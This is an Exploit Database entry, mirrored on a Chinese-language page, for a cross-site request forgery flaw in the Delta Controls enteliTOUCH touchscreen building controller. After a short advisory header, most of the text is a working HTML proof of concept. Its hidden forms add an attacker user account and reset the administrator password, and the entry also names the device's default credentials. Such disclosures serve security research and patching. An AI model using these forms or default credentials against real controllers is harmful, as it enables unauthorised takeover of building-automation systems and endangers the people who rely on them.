Delta Controls enteliTOUCH 3.40.3935 – Cross-Site Request Forgery (CSRF)

• Exploit Database
• 17 阅读

• 作者： LiquidWorm
  日期： 2022-04-19
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50878/

• # Exploit Tile: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)
  # Exploit Author: LiquidWorm
  
  <!DOCTYPE html>
  <html>
  <head><title>enteliTouch CSRF</title></head>
  <body>
  <!--
  
  Delta Controls enteliTOUCH 3.40.3935 Cross-Site Request Forgery (CSRF)
  
  
  Vendor: Delta Controls Inc.
  Product web page: https://www.deltacontrols.com
  Affected version: 3.40.3935
  3.40.3706
  3.33.4005
  
  Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
  access to the heart of your BAS. The enteliTOUCH has a 7-inch,
  high-resolution display that serves as an interface to your building.
  Use it as your primary interface for smaller facilities or as an
  on-the-spot access point for larger systems. The intuitive,
  easy-to-navigate interface gives instant access to manage your BAS.
  
  Desc: The application interface allows users to perform certain actions
  via HTTP requests without performing any validity checks to verify the
  requests. This can be exploited to perform certain actions with administrative
  privileges if a logged-in user visits a malicious web site.
  
  Tested on: DELTA enteliTOUCH
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2022-5702
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5702.php
  
  
  06.04.2022
  
  -->
  
  
  CSRF Add User:
  
  <form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Add&userName=&userPassword=" method="POST">
  <input type="hidden" name="actionName" value="" />
  <input type="hidden" name="Username" value="zsl" />
  <input type="hidden" name="Password" value="123t00t" />
  <input type="hidden" name="AutoLogout" value="17" />
  <input type="hidden" name="SS&#95;SelectedOptionId" value="FIL28" />
  <input type="hidden" name="ObjRef" value="" />
  <input type="hidden" name="Apply" value="true" />
  <input type="hidden" name="formAction" value="Add" />
  <input type="submit" value="Go for UserAdd" />
  </form>
  
  <br />
  
  CSRF Change Admin Password (default: delta:login):
  
  <form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Edit&userName=DELTA&userPassword=baaah" method="POST">
  <input type="hidden" name="actionName" value="" />
  <input type="hidden" name="Username" value="DELTA" />
  <input type="hidden" name="Password" value="123456" />
  <input type="hidden" name="AutoLogout" value="30" />
  <input type="hidden" name="SS&#95;SelectedOptionId" value="" />
  <input type="hidden" name="ObjRef" value="ZSL-251" />
  <input type="hidden" name="Apply" value="true" />
  <input type="hidden" name="formAction" value="Edit" />
  <input type="submit" value="Go for UserEdit" />
  </form>
  
  </body>
  </html>